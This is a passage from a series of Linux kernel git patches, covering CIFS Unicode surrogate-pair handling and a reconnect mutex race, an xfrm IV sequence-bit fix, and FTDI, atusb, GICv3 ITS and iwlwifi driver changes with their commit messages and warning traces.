about surrogate pair (and IVS). cifs_utf16_bytes() cifs_mapchar() cifs_from_utf16() cifsConvertToUTF16() Reported-by: Nakajima Akira Signed-off-by: Nakajima Akira Signed-off-by: Steve French --- fs/cifs/cifs_unicode.c | 182 ++++++++++++++++++++++++++++++----------- 1 file changed, 136 insertions(+), 46 deletions(-) diff --git a/fs/cifs/cifs_unicode.c b/fs/cifs/cifs_unicode.c index 0303c6793d90..5a53ac6b1e02 100644 --- a/fs/cifs/cifs_unicode.c +++ b/fs/cifs/cifs_unicode.c @@ -27,41 +27,6 @@ #include "cifsglob.h" #include "cifs_debug.h" -/* - * cifs_utf16_bytes - how long will a string be after conversion? - * @utf16 - pointer to input string - * @maxbytes - don't go past this many bytes of input string - * @codepage - destination codepage - * - * Walk a utf16le string and return the number of bytes that the string will - * be after being converted to the given charset, not including any null - * termination required. Don't walk past maxbytes in the source buffer. - */ -int -cifs_utf16_bytes(const __le16 *from, int maxbytes, - const struct nls_table *codepage) -{ - int i; - int charlen, outlen = 0; - int maxwords = maxbytes / 2; - char tmp[NLS_MAX_CHARSET_SIZE]; - __u16 ftmp; - - for (i = 0; i < maxwords; i++) { - ftmp = get_unaligned_le16(&from[i]); - if (ftmp == 0) - break; - - charlen = codepage->uni2char(ftmp, tmp, NLS_MAX_CHARSET_SIZE); - if (charlen > 0) - outlen += charlen; - else - outlen++; - } - - return outlen; -} - int cifs_remap(struct cifs_sb_info *cifs_sb) { int map_type; @@ -155,10 +120,13 @@ convert_sfm_char(const __u16 src_char, char *target) * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE). 
*/ static int -cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp, +cifs_mapchar(char *target, const __u16 *from, const struct nls_table *cp, int maptype) { int len = 1; + __u16 src_char; + + src_char = *from; if ((maptype == SFM_MAP_UNI_RSVD) && convert_sfm_char(src_char, target)) return len; @@ -168,10 +136,23 @@ cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp, /* if character not one of seven in special remap set */ len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE); - if (len <= 0) { - *target = '?'; - len = 1; - } + if (len <= 0) + goto surrogate_pair; + + return len; + +surrogate_pair: + /* convert SURROGATE_PAIR and IVS */ + if (strcmp(cp->charset, "utf8")) + goto unknown; + len = utf16s_to_utf8s(from, 3, UTF16_LITTLE_ENDIAN, target, 6); + if (len <= 0) + goto unknown; + return len; + +unknown: + *target = '?'; + len = 1; return len; } @@ -206,7 +187,7 @@ cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen, int nullsize = nls_nullsize(codepage); int fromwords = fromlen / 2; char tmp[NLS_MAX_CHARSET_SIZE]; - __u16 ftmp; + __u16 ftmp[3]; /* ftmp[3] = 3array x 2bytes = 6bytes UTF-16 */ /* * because the chars can be of varying widths, we need to take care @@ -217,9 +198,17 @@ cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen, safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize); for (i = 0; i < fromwords; i++) { - ftmp = get_unaligned_le16(&from[i]); - if (ftmp == 0) + ftmp[0] = get_unaligned_le16(&from[i]); + if (ftmp[0] == 0) break; + if (i + 1 < fromwords) + ftmp[1] = get_unaligned_le16(&from[i + 1]); + else + ftmp[1] = 0; + if (i + 2 < fromwords) + ftmp[2] = get_unaligned_le16(&from[i + 2]); + else + ftmp[2] = 0; /* * check to see if converting this character might make the @@ -234,6 +223,17 @@ cifs_from_utf16(char *to, const __le16 *from, int tolen, int fromlen, /* put converted char into 'to' buffer */ charlen = cifs_mapchar(&to[outlen], ftmp, codepage, map_type); outlen += charlen; + + /* charlen (=bytes of UTF-8 for 1 character) + * 4bytes UTF-8(surrogate pair) is charlen=4 + * (4bytes UTF-16 code) + * 7-8bytes UTF-8(IVS) is charlen=3+4 or 4+4 + * (2 UTF-8 pairs divided to 2 UTF-16 pairs) */ + if (charlen == 4) + i++; + else if (charlen >= 5) + /* 5-6bytes UTF-8 */ + i += 2; } /* properly null-terminate string */ @@ -295,6 +295,46 @@ cifs_strtoUTF16(__le16 *to, const char *from, int len, return i; } +/* + * cifs_utf16_bytes - how long will a string be after conversion? + * @utf16 - pointer to input string + * @maxbytes - don't go past this many bytes of input string + * @codepage - destination codepage + * + * Walk a utf16le string and return the number of bytes that the string will + * be after being converted to the given charset, not including any null + * termination required. Don't walk past maxbytes in the source buffer. 
+ */ +int +cifs_utf16_bytes(const __le16 *from, int maxbytes, + const struct nls_table *codepage) +{ + int i; + int charlen, outlen = 0; + int maxwords = maxbytes / 2; + char tmp[NLS_MAX_CHARSET_SIZE]; + __u16 ftmp[3]; + + for (i = 0; i < maxwords; i++) { + ftmp[0] = get_unaligned_le16(&from[i]); + if (ftmp[0] == 0) + break; + if (i + 1 < maxwords) + ftmp[1] = get_unaligned_le16(&from[i + 1]); + else + ftmp[1] = 0; + if (i + 2 < maxwords) + ftmp[2] = get_unaligned_le16(&from[i + 2]); + else + ftmp[2] = 0; + + charlen = cifs_mapchar(tmp, ftmp, codepage, NO_MAP_UNI_RSVD); + outlen += charlen; + } + + return outlen; +} + /* * cifs_strndup_from_utf16 - copy a string from wire format to the local * codepage @@ -409,10 +449,15 @@ cifsConvertToUTF16(__le16 *target, const char *source, int srclen, char src_char; __le16 dst_char; wchar_t tmp; + wchar_t *wchar_to; /* UTF-16 */ + int ret; + unicode_t u; if (map_chars == NO_MAP_UNI_RSVD) return cifs_strtoUTF16(target, source, PATH_MAX, cp); + wchar_to = kzalloc(6, GFP_KERNEL); + for (i = 0; i < srclen; j++) { src_char = source[i]; charlen = 1; @@ -441,11 +486,55 @@ cifsConvertToUTF16(__le16 *target, const char *source, int srclen, * if no match, use question mark, which at least in * some cases serves as wild card */ - if (charlen < 1) { - dst_char = cpu_to_le16(0x003f); - charlen = 1; + if (charlen > 0) + goto ctoUTF16; + + /* convert SURROGATE_PAIR */ + if (strcmp(cp->charset, "utf8") || !wchar_to) + goto unknown; + if (*(source + i) & 0x80) { + charlen = utf8_to_utf32(source + i, 6, &u); + if (charlen < 0) + goto unknown; + } else + goto unknown; + ret = utf8s_to_utf16s(source + i, charlen, + UTF16_LITTLE_ENDIAN, + wchar_to, 6); + if (ret < 0) + goto unknown; + + i += charlen; + dst_char = cpu_to_le16(*wchar_to); + if (charlen <= 3) + /* 1-3bytes UTF-8 to 2bytes UTF-16 */ + put_unaligned(dst_char, &target[j]); + else if (charlen == 4) { + /* 4bytes UTF-8(surrogate pair) to 4bytes UTF-16 + * 7-8bytes UTF-8(IVS) divided to 2 UTF-16 + * (charlen=3+4 or 4+4) */ + put_unaligned(dst_char, &target[j]); + dst_char = cpu_to_le16(*(wchar_to + 1)); + j++; + put_unaligned(dst_char, &target[j]); + } else if (charlen >= 5) { + /* 5-6bytes UTF-8 to 6bytes UTF-16 */ + put_unaligned(dst_char, &target[j]); + dst_char = cpu_to_le16(*(wchar_to + 1)); + j++; + put_unaligned(dst_char, &target[j]); + dst_char = cpu_to_le16(*(wchar_to + 2)); + j++; + put_unaligned(dst_char, &target[j]); } + continue; + +unknown: + dst_char = cpu_to_le16(0x003f); + charlen = 1; } + +ctoUTF16: /* * character may take more than one byte in the source string, * but will take exactly two bytes in the target string @@ -456,6 +545,7 @@ cifsConvertToUTF16(__le16 *target, const char *source, int srclen, ctoUTF16_out: put_unaligned(0, &target[j]); /* Null terminate target unicode string */ + kfree(wchar_to); return j; } From 4afe260bab50290a05e5732570329a530ed023f3 Mon Sep 17 00:00:00 2001 From: Federico Sauter Date: Tue, 17 Mar 2015 17:45:28 +0100 Subject: [PATCH 143/872] CIFS: Fix race condition on RFC1002_NEGATIVE_SESSION_RESPONSE This patch fixes a race condition that occurs when connecting to a NT 3.51 host without specifying a NetBIOS name. In that case a RFC1002_NEGATIVE_SESSION_RESPONSE is received and the SMB negotiation is reattempted, but under some conditions it leads SendReceive() to hang forever while waiting for srv_mutex. This, in turn, sets the calling process to an uninterruptible sleep state and makes it unkillable. 
The solution is to unlock the srv_mutex acquired in the demux thread *before* going to sleep (after the reconnect error) and before reattempting the connection. --- fs/cifs/connect.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c index f3bfe08e177b..8383d5ea4202 100644 --- a/fs/cifs/connect.c +++ b/fs/cifs/connect.c @@ -386,6 +386,7 @@ cifs_reconnect(struct TCP_Server_Info *server) rc = generic_ip_connect(server); if (rc) { cifs_dbg(FYI, "reconnect error %d\n", rc); + mutex_unlock(&server->srv_mutex); msleep(3000); } else { atomic_inc(&tcpSesReconnectCount); @@ -393,8 +394,8 @@ cifs_reconnect(struct TCP_Server_Info *server) if (server->tcpStatus != CifsExiting) server->tcpStatus = CifsNeedNegotiate; spin_unlock(&GlobalMid_Lock); + mutex_unlock(&server->srv_mutex); } - mutex_unlock(&server->srv_mutex); } while (server->tcpStatus == CifsNeedReconnect); return rc; From 3ad2a5f57656a14d964b673a5a0e4ab0e583c870 Mon Sep 17 00:00:00 2001 From: Minghuan Lian Date: Wed, 20 May 2015 10:13:15 -0500 Subject: [PATCH 144/872] irqchip/gicv3-its: ITS table size should not be smaller than PSZ When allocating a device table, if the requested allocation is smaller than the default granule size of the ITS then, we need to round up to the default size. Signed-off-by: Minghuan Lian [ stuart: Added comments and massaged changelog ] Signed-off-by: Stuart Yoder Reviewed-by: Marc Zygnier Cc: Cc: Link: http://lkml.kernel.org/r/1432134795-661-1-git-send-email-stuart.yoder@freescale.com Signed-off-by: Thomas Gleixner --- drivers/irqchip/irq-gic-v3-its.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c index 9687f8afebff..1b7e155869f6 100644 --- a/drivers/irqchip/irq-gic-v3-its.c +++ b/drivers/irqchip/irq-gic-v3-its.c @@ -828,7 +828,14 @@ static int its_alloc_tables(struct its_node *its) u64 typer = readq_relaxed(its->base + GITS_TYPER); u32 ids = GITS_TYPER_DEVBITS(typer); - order = get_order((1UL << ids) * entry_size); + /* + * 'order' was initialized earlier to the default page + * granule of the the ITS. We can't have an allocation + * smaller than that. If the requested allocation + * is smaller, round up to the default page granule. + */ + order = max(get_order((1UL << ids) * entry_size), + order); if (order >= MAX_ORDER) { order = MAX_ORDER - 1; pr_warn("%s: Device Table too large, reduce its page order to %u\n", From 407d34ef294727bdc200934c38d9a8241f4a5547 Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Thu, 21 May 2015 00:38:12 +0800 Subject: [PATCH 145/872] xfrm: Always zero high-order sequence number bits As we're now always including the high bits of the sequence number in the IV generation process we need to ensure that they don't contain crap. This patch ensures that the high sequence bits are always zeroed so that we don't leak random data into the IV. 
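A compact way to see the problem, using a hypothetical mirror of the low/hi split rather than the real xfrm structures: the output sequence number is carried as two 32-bit halves, and an IV built from both halves picks up whatever the high half happened to contain unless it is written explicitly.

#include <linux/types.h>

struct output_seq {	/* hypothetical stand-in for the seq.output fields */
	__u32 low;
	__u32 hi;
};

static void record_non_esn_seq(struct output_seq *seq, __u32 oseq)
{
	seq->low = oseq;
	seq->hi = 0;	/* clear explicitly, or stale memory ends up in the IV */
}

The two hunks below apply exactly this to the legacy and bitmap replay paths.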
Signed-off-by: Herbert Xu Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_replay.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/net/xfrm/xfrm_replay.c b/net/xfrm/xfrm_replay.c index dab57daae408..4fd725a0c500 100644 --- a/net/xfrm/xfrm_replay.c +++ b/net/xfrm/xfrm_replay.c @@ -99,6 +99,7 @@ static int xfrm_replay_overflow(struct xfrm_state *x, struct sk_buff *skb) if (x->type->flags & XFRM_TYPE_REPLAY_PROT) { XFRM_SKB_CB(skb)->seq.output.low = ++x->replay.oseq; + XFRM_SKB_CB(skb)->seq.output.hi = 0; if (unlikely(x->replay.oseq == 0)) { x->replay.oseq--; xfrm_audit_state_replay_overflow(x, skb); @@ -177,6 +178,7 @@ static int xfrm_replay_overflow_bmp(struct xfrm_state *x, struct sk_buff *skb) if (x->type->flags & XFRM_TYPE_REPLAY_PROT) { XFRM_SKB_CB(skb)->seq.output.low = ++replay_esn->oseq; + XFRM_SKB_CB(skb)->seq.output.hi = 0; if (unlikely(replay_esn->oseq == 0)) { replay_esn->oseq--; xfrm_audit_state_replay_overflow(x, skb); From 1df5b888f54070a373a73b34488cc78c2365b7b4 Mon Sep 17 00:00:00 2001 From: Patrick Riphagen Date: Tue, 19 May 2015 10:03:01 +0200 Subject: [PATCH 146/872] USB: serial: ftdi_sio: Add support for a Motion Tracker Development Board This adds support for new Xsens device, Motion Tracker Development Board, using Xsens' own Vendor ID Signed-off-by: Patrick Riphagen Cc: stable@vger.kernel.org Signed-off-by: Johan Hovold --- drivers/usb/serial/ftdi_sio.c | 1 + drivers/usb/serial/ftdi_sio_ids.h | 1 + 2 files changed, 2 insertions(+) diff --git a/drivers/usb/serial/ftdi_sio.c b/drivers/usb/serial/ftdi_sio.c index 8eb68a31cab6..4c8b3b82103d 100644 --- a/drivers/usb/serial/ftdi_sio.c +++ b/drivers/usb/serial/ftdi_sio.c @@ -699,6 +699,7 @@ static const struct usb_device_id id_table_combined[] = { { USB_DEVICE(XSENS_VID, XSENS_AWINDA_DONGLE_PID) }, { USB_DEVICE(XSENS_VID, XSENS_AWINDA_STATION_PID) }, { USB_DEVICE(XSENS_VID, XSENS_CONVERTER_PID) }, + { USB_DEVICE(XSENS_VID, XSENS_MTDEVBOARD_PID) }, { USB_DEVICE(XSENS_VID, XSENS_MTW_PID) }, { USB_DEVICE(FTDI_VID, FTDI_OMNI1509) }, { USB_DEVICE(MOBILITY_VID, MOBILITY_USB_SERIAL_PID) }, diff --git a/drivers/usb/serial/ftdi_sio_ids.h b/drivers/usb/serial/ftdi_sio_ids.h index 4e4f46f3c89c..792e054126de 100644 --- a/drivers/usb/serial/ftdi_sio_ids.h +++ b/drivers/usb/serial/ftdi_sio_ids.h @@ -155,6 +155,7 @@ #define XSENS_AWINDA_STATION_PID 0x0101 #define XSENS_AWINDA_DONGLE_PID 0x0102 #define XSENS_MTW_PID 0x0200 /* Xsens MTw */ +#define XSENS_MTDEVBOARD_PID 0x0300 /* Motion Tracker Development Board */ #define XSENS_CONVERTER_PID 0xD00D /* Xsens USB-serial converter */ /* Xsens devices using FTDI VID */ From 33a238ae65cee561b3eb78694a41cd3e196fe59c Mon Sep 17 00:00:00 2001 From: Stefan Schmidt Date: Thu, 21 May 2015 16:51:35 +0200 Subject: [PATCH 147/872] ieee802154/atusb: Warn about outdated device firmware. Together with mainlining the driver we released a first public binary version of the device firmware. This is version 0.2. With this change we warn users who run outdated versions of the firmware. While we have not seen problems with it yet (thus no error, but a warning only) it would be better to run the released and tested firmware. 
You can find released versions here: http://downloads.qi-hardware.com/people/werner/wpan/web/ Signed-off-by: Stefan Schmidt Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/atusb.c | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c index ea1259ef8508..9d07dd720bbb 100644 --- a/drivers/net/ieee802154/atusb.c +++ b/drivers/net/ieee802154/atusb.c @@ -469,6 +469,12 @@ static int atusb_get_and_show_revision(struct atusb *atusb) dev_info(&usb_dev->dev, "Firmware: major: %u, minor: %u, hardware type: %u\n", buffer[0], buffer[1], buffer[2]); + if (buffer[0] == 0 && buffer[1] < 2) { + dev_info(&usb_dev->dev, + "Firmware version (%u.%u) is predates our first public release.", + buffer[0], buffer[1]); + dev_info(&usb_dev->dev, "Please update to version 0.2 or newer"); + } return ret; } From f1a71886c59f1d981d3848c744e617d2f7e4149e Mon Sep 17 00:00:00 2001 From: Stefan Schmidt Date: Thu, 21 May 2015 16:51:36 +0200 Subject: [PATCH 148/872] ieee802154/atusb: Mark driver as AACK enabled in hardware. Since firmware version 0.2 we use AACK handling directly in the firmware. Inform the stack that the hardware supports and uses it. Signed-off-by: Stefan Schmidt Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/atusb.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c index 9d07dd720bbb..eef1d8aa0269 100644 --- a/drivers/net/ieee802154/atusb.c +++ b/drivers/net/ieee802154/atusb.c @@ -568,7 +568,8 @@ static int atusb_probe(struct usb_interface *interface, goto fail; hw->parent = &usb_dev->dev; - hw->flags = IEEE802154_HW_TX_OMIT_CKSUM | IEEE802154_HW_AFILT; + hw->flags = IEEE802154_HW_TX_OMIT_CKSUM | IEEE802154_HW_AFILT | + IEEE802154_HW_AACK; hw->phy->current_page = 0; hw->phy->current_channel = 11; /* reset default */ From 2d8cbd31dd5d4fe7825e1ab88f39c283849db946 Mon Sep 17 00:00:00 2001 From: Stefan Schmidt Date: Thu, 21 May 2015 16:51:37 +0200 Subject: [PATCH 149/872] ieee802154/atusb: Set default ed level to 0xbe like the rest of these drivers Signed-off-by: Stefan Schmidt Acked-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/atusb.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c index eef1d8aa0269..1e18774240b2 100644 --- a/drivers/net/ieee802154/atusb.c +++ b/drivers/net/ieee802154/atusb.c @@ -365,8 +365,8 @@ static int atusb_channel(struct ieee802154_hw *hw, u8 page, u8 channel) static int atusb_ed(struct ieee802154_hw *hw, u8 *level) { - /* @@@ not used by the stack yet */ - *level = 0; + BUG_ON(!level); + *level = 0xbe; return 0; } From 2fc863a5143d64b8f06576cc3d7fd5622c5cf3b5 Mon Sep 17 00:00:00 2001 From: Haim Dreyfuss Date: Wed, 20 May 2015 08:10:43 +0300 Subject: [PATCH 150/872] iwlwifi: mvm: Free fw_status after use to avoid memory leak fw_status is the only pointer pointing to a block of memory allocated above and should be freed after use. Note: this come from Klockwork static analyzer. 
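Reduced to its core, the fix follows the single-owner rule sketched here; wakeup_status and consume_wakeup_status are hypothetical names, while IS_ERR_OR_NULL() and kfree() are the real kernel API. Copy out what is needed from the returned buffer and free it on the same path, so no branch can exit with the allocation still live.

#include <linux/err.h>
#include <linux/slab.h>

struct wakeup_status {	/* hypothetical stand-in for the firmware response */
	u32 wakeup_reasons;
};

static u32 consume_wakeup_status(struct wakeup_status *status)
{
	u32 reasons = 0;

	if (!IS_ERR_OR_NULL(status)) {
		reasons = status->wakeup_reasons;
		kfree(status);	/* the only reference to the buffer - release it here */
	}

	return reasons;
}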
Cc: stable@vger.kernel.org [3.19+] Fixes: 2021a89d7b8a ("iwlwifi: mvm: treat netdetect wake up separately") Signed-off-by: Haim Dreyfuss Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 1b1b2bf26819..42dadaf5e24d 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1750,8 +1750,10 @@ static void iwl_mvm_query_netdetect_reasons(struct iwl_mvm *mvm, int i, j, n_matches, ret; fw_status = iwl_mvm_get_wakeup_status(mvm, vif); - if (!IS_ERR_OR_NULL(fw_status)) + if (!IS_ERR_OR_NULL(fw_status)) { reasons = le32_to_cpu(fw_status->wakeup_reasons); + kfree(fw_status); + } if (reasons & IWL_WOWLAN_WAKEUP_BY_RFKILL_DEASSERTED) wakeup.rfkill_release = true; From 18f84673fb0fb3b4727ecf53a7455874172899d4 Mon Sep 17 00:00:00 2001 From: Liad Kaufman Date: Wed, 20 May 2015 15:50:07 +0300 Subject: [PATCH 151/872] iwlwifi: nvm: force mac from otp in case nvm mac is reserved Take the MAC address from the OTP even if one is present in the NVM, if that MAC address happens to be a reserved one. Signed-off-by: Liad Kaufman Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-nvm-parse.c | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c index cf86f3cdbb8e..75e96db6626b 100644 --- a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c +++ b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c @@ -533,6 +533,10 @@ static void iwl_set_hw_address_family_8000(struct device *dev, const u8 *hw_addr; if (mac_override) { + static const u8 reserved_mac[] = { + 0x02, 0xcc, 0xaa, 0xff, 0xee, 0x00 + }; + hw_addr = (const u8 *)(mac_override + MAC_ADDRESS_OVERRIDE_FAMILY_8000); @@ -544,7 +548,12 @@ static void iwl_set_hw_address_family_8000(struct device *dev, data->hw_addr[4] = hw_addr[5]; data->hw_addr[5] = hw_addr[4]; - if (is_valid_ether_addr(data->hw_addr)) + /* + * Force the use of the OTP MAC address in case of reserved MAC + * address in the NVM, or if address is given but invalid. + */ + if (is_valid_ether_addr(data->hw_addr) && + memcmp(reserved_mac, hw_addr, ETH_ALEN) != 0) return; IWL_ERR_DEV(dev, From 165b3c4f78ca72bd83bf6abd9ecc472c09f444d3 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Mon, 4 May 2015 11:20:52 +0300 Subject: [PATCH 152/872] iwlwifi: mvm: BT Coex - duplicate the command if sent ASYNC There are buses that can't handle ASYNC command without copying them. Duplicate the host command instead. 
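The lifetime issue behind this can be shown with a generic, driver-independent sketch; queued_cmd, queue_cmd_dup and the plain C allocator are illustrative and not the iwlwifi API. An asynchronous sender returns before the command is actually handed to the bus, so it must not keep referencing a buffer it does not own; duplicating the payload at submit time removes that dependency, which, going by the flag names and the commit text, is what IWL_HCMD_DFL_DUP requests where IWL_HCMD_DFL_NOCOPY would have reused the caller's buffer.

#include <stdlib.h>
#include <string.h>

struct queued_cmd {
	void *payload;
	size_t len;
};

static int queue_cmd_dup(struct queued_cmd *slot, const void *payload, size_t len)
{
	slot->payload = malloc(len);
	if (!slot->payload)
		return -1;
	memcpy(slot->payload, payload, len);	/* private copy outlives the caller */
	slot->len = len;
	return 0;	/* submission can now complete at any later time */
}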
Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/coex_legacy.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/coex_legacy.c b/drivers/net/wireless/iwlwifi/mvm/coex_legacy.c index d954591e0be5..6ac6de2af977 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex_legacy.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex_legacy.c @@ -776,7 +776,7 @@ static int iwl_mvm_bt_coex_reduced_txp(struct iwl_mvm *mvm, u8 sta_id, struct iwl_host_cmd cmd = { .id = BT_CONFIG, .len = { sizeof(*bt_cmd), }, - .dataflags = { IWL_HCMD_DFL_NOCOPY, }, + .dataflags = { IWL_HCMD_DFL_DUP, }, .flags = CMD_ASYNC, }; struct iwl_mvm_sta *mvmsta; From dcfc7fb134afc3b8e3d1070ef6a6d6faa9d383ef Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Tue, 28 Apr 2015 08:41:55 +0300 Subject: [PATCH 153/872] iwlwifi: mvm: take the UCODE_DOWN reference when resuming The __iwl_mvm_resume() function always returns 1, which causes mac80211 to do a reconfig with IEEE80211_RECONFIG_TYPE_RESTART. This type of reconfig calls iwl_mvm_restart_complete(), where we unref the IWL_MVM_REF_UCODE_DOWN, so we should always take the reference in this case. This prevents this kind of warning from happening: [40026.103025] WARNING: at /root/iwlwifi/iwlwifi-stack-dev/drivers/net/wireless/iwlwifi/mvm/mac80211.c:236 iwl_mvm_unref+0xc9/0xd0 [iwlmvm]() [40026.105145] Modules linked in: iwlmvm(O) iwlwifi(O) mac80211(O) cfg80211(O) compat(O) ctr ccm arc4 autofs4 snd_hda_codec_hdmi snd_hda_codec_idt joydev coretemp kvm_intel kvm aesni_intel ablk_helper cryptd lrw aes_i586 snd_hda_intel xts snd_hda_codec gf128mul snd_hwdep snd_pcm snd_seq_midi dell_wmi snd_rawmidi sparse_keymap snd_seq_midi_event snd_seq uvcvideo dell_laptop videobuf2_core dcdbas microcode videodev psmouse snd_timer videobuf2_vmalloc videobuf2_memops serio_raw snd_seq_device btusb i915 snd bluetooth lpc_ich drm_kms_helper soundcore snd_page_alloc drm i2c_algo_bit wmi parport_pc ppdev video binfmt_misc rpcsec_gss_krb5 nfsd mac_hid nfs_acl nfsv4 auth_rpcgss nfs fscache lockd sunrpc msdos lp parport sdhci_pci sdhci ahci libahci e1000e mmc_core ptp pps_core [last unloaded: compat] [40026.117640] CPU: 2 PID: 3827 Comm: bash Tainted: G W O 3.10.29-dev #1 [40026.120216] Hardware name: Dell Inc. Latitude E6430/0CPWYR, BIOS A09 12/13/2012 [40026.122815] f8effd18 f8effd18 e740fd18 c168aa62 e740fd40 c103a824 c1871238 f8effd18 [40026.125527] 000000ec f8ec79c9 f8ec79c9 d5d29ba4 d5d2a20c 00000000 e740fd50 c103a862 [40026.128209] 00000009 00000000 e740fd7c f8ec79c9 f1c591c4 00000400 00000000 f8efb490 [40026.130886] Call Trace: [40026.133506] [] dump_stack+0x16/0x18 [40026.136115] [] warn_slowpath_common+0x64/0x80 [40026.138727] [] ? iwl_mvm_unref+0xc9/0xd0 [iwlmvm] [40026.141319] [] ? iwl_mvm_unref+0xc9/0xd0 [iwlmvm] [40026.143881] [] warn_slowpath_null+0x22/0x30 [40026.146453] [] iwl_mvm_unref+0xc9/0xd0 [iwlmvm] [40026.149030] [] iwl_mvm_mac_reconfig_complete+0x7d/0x210 [iwlmvm] [40026.151645] [] ? ftrace_raw_event_drv_reconfig_complete+0xc0/0xe0 [mac80211] [40026.154291] [] ieee80211_reconfig+0x28e/0x2620 [mac80211] [40026.156920] [] ? ring_buffer_unlock_commit+0xba/0x100 [40026.159585] [] ieee80211_resume+0x6d/0x80 [mac80211] [40026.162206] [] wiphy_resume+0x72/0x260 [cfg80211] [40026.164799] [] ? device_resume+0x57/0x150 [40026.167425] [] ? 
wiphy_suspend+0x710/0x710 [cfg80211] [40026.170075] [] dpm_run_callback+0x2e/0x50 [40026.172695] [] device_resume+0x91/0x150 [40026.175334] [] dpm_resume+0xf6/0x200 [40026.177922] [] dpm_resume_end+0x10/0x20 [40026.180489] [] suspend_devices_and_enter+0x177/0x480 [40026.183037] [] ? printk+0x4d/0x4f [40026.185559] [] pm_suspend+0x176/0x210 [40026.188065] [] state_store+0x5d/0xb0 [40026.190581] [] ? wakeup_count_show+0x50/0x50 [40026.193052] [] kobj_attr_store+0x1b/0x30 [40026.195608] [] sysfs_write_file+0xab/0x100 [40026.198055] [] ? sysfs_poll+0xa0/0xa0 [40026.200469] [] vfs_write+0xa5/0x1c0 [40026.202893] [] SyS_write+0x57/0xa0 [40026.205245] [] sysenter_do_call+0x12/0x32 [40026.207619] ---[ end trace db1d5a72a0381b0a ]--- Signed-off-by: Luciano Coelho Reviewed-by: EliadX Peller Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 42dadaf5e24d..91ca8df007f7 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1917,6 +1917,14 @@ static int __iwl_mvm_resume(struct iwl_mvm *mvm, bool test) /* return 1 to reconfigure the device */ set_bit(IWL_MVM_STATUS_IN_HW_RESTART, &mvm->status); set_bit(IWL_MVM_STATUS_D3_RECONFIG, &mvm->status); + + /* We always return 1, which causes mac80211 to do a reconfig + * with IEEE80211_RECONFIG_TYPE_RESTART. This type of + * reconfig calls iwl_mvm_restart_complete(), where we unref + * the IWL_MVM_REF_UCODE_DOWN, so we need to take the + * reference here. + */ + iwl_mvm_ref(mvm, IWL_MVM_REF_UCODE_DOWN); return 1; } @@ -2023,7 +2031,6 @@ static int iwl_mvm_d3_test_release(struct inode *inode, struct file *file) __iwl_mvm_resume(mvm, true); rtnl_unlock(); iwl_abort_notification_waits(&mvm->notif_wait); - iwl_mvm_ref(mvm, IWL_MVM_REF_UCODE_DOWN); ieee80211_restart_hw(mvm->hw); /* wait for restart and disconnect all interfaces */ From a500e469ead055f35c7b2d0a1104e1bd58e34e70 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Mon, 4 May 2015 17:03:17 +0300 Subject: [PATCH 154/872] iwlwifi: mvm: clean net-detect info if device was reset during suspend If the device is reset during suspend with net-detect enabled, we leave the net-detect information dangling and this causes the next suspend to fail with a warning: [21795.351010] WARNING: at /root/iwlwifi/iwlwifi-stack-dev/drivers/net/wireless/iwlwifi/mvm/d3.c:989 __iwl_mvm_suspend.isra.6+0x2be/0x460 [iwlmvm]() [21795.353253] Modules linked in: iwlmvm(O) iwlwifi(O) mac80211(O) cfg80211(O) compat(O) [...] [21795.366168] CPU: 1 PID: 3645 Comm: bash Tainted: G O 3.10.29-dev #1 [21795.368785] Hardware name: Dell Inc. Latitude E6430/0CPWYR, BIOS A09 12/13/2012 [21795.371441] f8ec6748 f8ec6748 e51f3ce8 c168aa62 e51f3d10 c103a824 c1871238 